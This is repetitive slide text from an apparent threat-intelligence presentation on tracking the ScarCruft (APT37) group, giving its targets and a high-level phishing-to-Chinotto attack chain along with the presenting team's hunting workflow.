ScarCruft 그룹 위협 추적과 Defend Forward
Contents
ScarCruft 그룹 위협 추적과
Defend Forward
AGENDA
Who are we?
What is ScarCruft?
Threat Tracking
Defend Forward
Who are we?
Profound Analysis Team
Identify and respond to threats by analyzing cyber incidents
to minimize and prevent damage to cyber incidents
Who are we?
Threat Hunting Life cycle
Yara Rule
VirusTotal
Sigma Rule
Inteligence
Report
Result
Hunting
HUMINT
고위험 침해사고 선별, 집중 분석
Incident Response
FENS
Malware
Sandbox
Analyzing ( Analyst)
Analyzing ( system)
Network
What is ScarCruft ?
aka:
APT 37, Group123
Ricochet Chollima, Venus121
Target :
Journalists
North Korean defectors
Goverment Officials
malpedia.caad.fkie.fraunhofer.de/actor/apt37
What is ScarCruft ?
21.11 ~
ScarCruft Group
Threat Tracking & Defend Forward
Known TTPs
’21 ~ ’22 2/4
Phishing Mail
E-mail Attachment link Click
&
Download Office Document
compromise host A
load Office Macro Script
Decoy document
compromise host B
Download Malicious Script
>_
Command Control
compromise host C
Chinotto
Information Collection
& exfiltration
Known TTPs
’21 ~ ’22 2/4
Phishing Mail
E-mail Attachment link Click
&
Download Office Document
compromise host A
load Office Macro Script
Decoy document
compromise host B
Download Malicious Script
>_
Command Control
compromise host C
Chinotto
Information Collection
& exfiltration
Known TTPs
’21 ~ ’22 2/4
Phishing Mail
E-mail Attachment link Click
&
Download Office Document
compromise host A
load Office Macro Script
Decoy document
compromise host B
Download Malicious Script
>_
Command Control
compromise host C
Chinotto
Information Collection
& exfiltration
Known …
Defend Forward
AGENDA
Who are we?
What is ScarCruft?
Threat Tracking
Defend Forward
Who are we?
Profound Analysis Team
Identify and respond to threats by analyzing cyber incidents
to minimize and prevent damage to cyber incidents
Who are we?
Threat Hunting Life cycle
Yara Rule
VirusTotal
Sigma Rule
Inteligence
Report
Result
Hunting
HUMINT
고위험 침해사고 선별, 집중 분석
Incident Response
FENS
Malware
Sandbox
Analyzing ( Analyst)
Analyzing ( system)
Network
What is ScarCruft ?
aka:
APT 37, Group123
Ricochet Chollima, Venus121
Target :
Journalists
North Korean defectors
Goverment Officials
malpedia.caad.fkie.fraunhofer.de/actor/apt37
What is ScarCruft ?
21.11 ~
ScarCruft Group
Threat Tracking & Defend Forward
Known TTPs
’21 ~ ’22 2/4
Phishing Mail
E-mail Attachment link Click
&
Download Office Document
compromise host A
load Office Macro Script
Decoy document
compromise host B
Download Malicious Script
>_
Command Control
compromise host C
Chinotto
Information Collection
& exfiltration
Known TTPs
’21 ~ ’22 2/4
Phishing Mail
E-mail Attachment link Click
&
Download Office Document
compromise host A
load Office Macro Script
Decoy document
compromise host B
Download Malicious Script
>_
Command Control
compromise host C
Chinotto
Information Collection
& exfiltration
Known TTPs
’21 ~ ’22 2/4
Phishing Mail
E-mail Attachment link Click
&
Download Office Document
compromise host A
load Office Macro Script
Decoy document
compromise host B
Download Malicious Script
>_
Command Control
compromise host C
Chinotto
Information Collection
& exfiltration
Known …